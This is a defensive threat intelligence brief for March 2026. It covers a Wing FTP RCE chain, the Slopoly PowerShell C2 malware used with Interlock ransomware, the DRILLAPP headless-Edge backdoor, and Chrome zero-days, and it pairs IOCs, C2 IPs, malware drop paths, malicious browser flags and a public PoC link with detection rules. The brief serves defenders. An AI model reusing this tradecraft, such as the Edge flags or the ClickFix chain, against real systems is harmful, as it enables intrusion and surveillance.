Cyber Threat Brief — March 17 2026
Previous brief: March 16 2026 (if available)
1. Wing FTP Server Exploit Chain — CVE-2025-47813 + CVE-2025-47812
Summary
Wing FTP Server is back in the spotlight with a two-punch exploit chain that CISA formalized yesterday. CVE-2025-47813 (info disclosure via UID cookie) leaks the server’s local installation path — trivial on its own, devastating as a setup for CVE-2025-47812, the CVSS 10.0 RCE that’s been exploited in the wild since June 2025. The PoC is public. The chain is live. If you have Wing FTP exposed, treat this as a fire drill.
What’s New (Last 24 Hours)
- 2026-03-16: CISA added CVE-2025-47813 to the KEV catalog, giving FCEB agencies until 2026-03-30 to patch.
- Chain exploitation confirmed: CVE-2025-47813 feeds path info directly into CVE-2025-47812 for unauthenticated-to-root RCE.
- PoC for CVE-2025-47813 publicly available: https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-47813.txt
- Researcher Julien Ahrens confirmed the chain mechanism and shared technical writeup.
- Fix available in Wing FTP Server v7.4.4 (patched May 2025).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
UID cookie with oversized value (error message leaks install path) | TTP | T1190 | Web/App server access logs | Alert on Wing FTP access logs showing abnormally long UID cookie values triggering error responses containing local paths |
Wing FTP web interface response containing C:\Program Files\Wing FTP Server\ or similar local path strings | IOC | T1005 | Web proxy / DLP | Hunt web proxy logs for responses from Wing FTP ports (21, 22, 80, 443) leaking filesystem paths in HTTP responses |
| Unauthenticated POST to Wing FTP admin endpoint leading to command execution (CVE-2025-47812) | TTP | T1190 | Web/App server logs, EDR | Alert on Wing FTP process spawning child processes (cmd.exe, powershell.exe, sh) after web request |
wftpserver.exe spawning unexpected child processes | TTP | T1059 | EDR process telemetry | Baseline normal Wing FTP process tree; alert on any non-standard child process |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | Web or Application Server Spawning a Shell | Covers the RCE stage: detects when a web/FTP server process (like wftpserver.exe) spawns shell interpreters — the primary indicator of CVE-2025-47812 exploitation in progress. |
| Elastic | Suspicious Child Execution via Web Server | Detects shell spawning from web server processes; applies to post-exploitation via CVE-2025-47812 on Linux deployments of Wing FTP. |
| Sigma | Suspicious Process By Web Server Process | Flags suspicious processes spawned by web-tier processes; with field tuning to include wftpserver.exe as a parent, covers the RCE exploitation outcome. No direct Wing FTP–specific rule exists; gap coverage via generic web-server-child-process detection. |
Sources
2. Hive0163 / Slopoly — AI-Generated C2 Malware + Interlock Ransomware
Summary
IBM X-Force dropped a report on “Slopoly,” a PowerShell C2 client that bears all the hallmarks of LLM generation — verbose comments, clean error handling, an unused Jitter function, and a file path under C:\ProgramData\Microsoft\Windows\Runtime\ that would make a human operator blush. The group behind it (Hive0163) chains ClickFix social engineering → JunkFiction loader → NodeSnake backdoor → Slopoly for persistent C2 → Interlock ransomware + AzCopy exfil. The IOCs are fresh and the attack chain is well-documented.
What’s New (Last 24 Hours)
- IBM X-Force published full technical report on Slopoly (2026-03-16/17).
- Slopoly drops to
C:\ProgramData\Microsoft\Windows\Runtime\ with persistence via scheduled task named “Runtime Broker”.
- C2 infrastructure:
plurfestivalgalaxy[.]com (deactivated), IPs: 94.156.181[.]89, 77.42.75[.]119, 23.227.203[.]123, 172.86.68[.]64.
- ClickFix initial access: fake CAPTCHA prompts victim to press Win+R and execute clipboard-pasted PowerShell.
- Attack chain: ClickFix → JunkFiction loader → NodeSnake (Node.js backdoor, HTTP POST C2) → Slopoly → Interlock ransomware → AzCopy (data exfil) + Advanced IP Scanner (recon).
- Interlock delivered as 64-bit PE wrapped in JunkFiction, dropped to
%TEMP%.
- RunMRU registry key populated by Win+R ClickFix execution; defenders can hunt
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for unusual entries.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
C:\ProgramData\Microsoft\Windows\Runtime\ (Slopoly drop path) | TTP | T1036.005 | EDR file/process telemetry | Alert on script execution from this path; no legitimate Windows process writes here |
| Scheduled task named “Runtime Broker” (masquerading as system task) | TTP | T1053.005 | Windows Event Log (TaskScheduler 4698) | Alert on schtask creation with name “Runtime Broker” by non-SYSTEM processes |
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with encoded PowerShell | IOC | T1059.001 | Windows Registry / EDR | Periodic polling of RunMRU for base64-encoded or mshta/powershell strings — ClickFix artifact |
94.156.181[.]89, 77.42.75[.]119, 23.227.203[.]123, 172.86.68[.]64 | IOC | T1071.001 | Firewall / proxy / NDR | Block and alert on outbound connections to these IPs; correlate with PowerShell processes |
plurfestivalgalaxy[.]com | IOC | T1071.001 | DNS / proxy | DNS block + alert; legacy C2 domain, but useful for retrospective hunting |
AzCopy.exe executing with cloud storage destination | TTP | T1537 | EDR process telemetry | Alert on AzCopy spawned by non-admin users or from unusual parent processes (loader, svchost) |
Advanced IP Scanner execution prior to ransomware | TTP | T1046 | EDR process telemetry | Flag Advanced IP Scanner execution in contexts outside IT-admin hours or from unexpected user accounts |
JunkFiction loader dropped to %TEMP%\ as 64-bit PE | TTP | T1027 | EDR file events | Alert on PE files written to TEMP by browser/office parent processes |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
Summary
Russia-linked Laundry Bear (UAC-0190, Void Blizzard) has a new JavaScript backdoor called DRILLAPP that’s genuinely clever: it launches Microsoft Edge in headless mode with DevTools Protocol enabled, uses Pastefy as a dead-drop C2 resolver, and leverages the browser’s own APIs to capture files, microphone audio, webcam images, and screenshots — all without writing a traditional RAT to disk. The lure themes are judicial/charity-flavored, timed for Ukrainian targets. The EDR detection angle is juicy: msedge.exe with suspicious command-line flags is the tell.
What’s New (Last 24 Hours)
- S2 Grupo LAB52 published full technical analysis (2026-03-16); Security Affairs corroborated 2026-03-17.
- Two campaign variants observed (early and late February 2026):
- V1: LNK → HTA in
%TEMP% → remote script on Pastefy → Edge headless
- V2: Windows Control Panel modules (.cpl) replacing LNK files; added recursive file enumeration + batch upload
- Persistence: LNK files copied to
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
- C2 via WebSocket URL fetched dynamically from Pastefy dead-drop resolver
- Device fingerprinting via canvas fingerprinting on first run; timezone-based country check (specifically checks for Ukraine)
- Edge launched with:
--no-sandbox --disable-web-security --allow-file-access-from-files --use-fake-ui-for-media-stream --auto-select-screen-capture-source=true --disable-user-media-security --remote-debugging-port=<PORT>
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
msedge.exe spawned with --remote-debugging-port and --no-sandbox flags | TTP | T1218 | EDR process telemetry (command-line) | Alert on any msedge.exe launch including --remote-debugging-port or --no-sandbox --disable-web-security in command line |
LNK file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ | TTP | T1547.001 | EDR file events | Alert on .lnk files written to Startup folder by non-installer processes |
HTA file created in %TEMP% | TTP | T1218.005 | EDR file/process events | Alert on .hta creation in TEMP followed by mshta.exe execution |
DNS/HTTPS requests to pastefy.app from browser or non-user processes | IOC | T1102.001 | DNS logs / proxy | Flag pastefy.app in process-correlated DNS/web logs; especially from msedge.exe or mshta.exe |
| WebSocket C2 connection established by headless Edge | TTP | T1071.001 | NDR / proxy | Monitor for WebSocket upgrades (Upgrade: websocket headers) initiated by msedge.exe in non-interactive sessions |
.cpl file execution (V2 variant) | TTP | T1218.002 | EDR process events | Alert on Control Panel item execution from user-writable paths (Downloads, TEMP, Desktop) |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. Google Chrome Zero-Days CVE-2026-3909 & CVE-2026-3910 (Skia + V8, Actively Exploited)
Summary
Google shipped an emergency Chrome update last week to patch two CVSS 8.8 zero-days already being exploited in the wild. CVE-2026-3909 is an out-of-bounds write in the Skia graphics library (crafted HTML triggers OOB memory access), and CVE-2026-3910 is an inappropriate implementation in V8 that enables sandbox-contained code execution via crafted HTML. CISA added both to KEV on March 13 (FCEB deadline March 27). No attribution yet, no exploit code public. Update to Chrome 146.0.7680.75/76. Edge, Brave, Opera, Vivaldi users — watch your respective update channels.
What’s New (Last 24 Hours)
- CISA KEV addition confirmed 2026-03-13 (FCEB patch deadline: 2026-03-27).
- Emergency patch: Chrome 146.0.7680.75/76 (Windows/macOS), 146.0.7680.75 (Linux).
- Google confirmed in-wild exploitation for both; no public exploit code or threat actor attribution.
- This is Chrome’s 3rd actively exploited zero-day of 2026 (prior: CVE-2026-2441 in February).
- All Chromium-based browsers (Edge, Brave, Opera, Vivaldi) affected until vendor patches ship.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
Chrome version below 146.0.7680.75 | TTP | T1203 | Asset inventory / EDR software version telemetry | Hunt for endpoints running Chrome < 146.0.7680.75 as priority patch targets; block browser launch on outdated versions if policy allows |
| Crafted HTML page triggering unusual memory access (browser crash/restart loop) | TTP | T1189 | Web proxy / browser telemetry | Alert on browser crash events (crash dumps) correlated with new site visits or email-linked URLs |
| Browser process spawning unexpected child process post-crash or after unusual HTML render | TTP | T1203 | EDR process telemetry | Monitor chrome.exe / msedge.exe for post-crash child process spawning (cmd.exe, powershell.exe, etc.) |
| Network connections from browser process to non-CDN IPs immediately after page load from unknown domain | TTP | T1071.001 | Proxy / NDR | Baseline browser C2 patterns; alert on short-lived browser connections to IPs with no prior reputation |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|
| Splunk | None found | No Splunk ESCU rule exists directly for Skia/V8 browser exploit telemetry. Recommend using Software Inventory detection for version-based patching compliance and correlating with browser crash logs. |
| Elastic | Suspicious Browser Child Process | Partial coverage: covers post-exploitation child process spawning from browser processes on macOS. No equivalent Windows rule exists. Extend to Windows by adding Chrome/Edge process parent correlation. |
| Sigma | Suspicious Browser Child Process - MacOS, Antivirus Exploitation Framework Detection | Browser child process rule is macOS-only; AV exploitation detection depends on endpoint AV telemetry. Primary gap: no Windows-targeted browser exploit detection rule exists for this CVE pair. Best current coverage is version-based inventory + crash correlation. |
Sources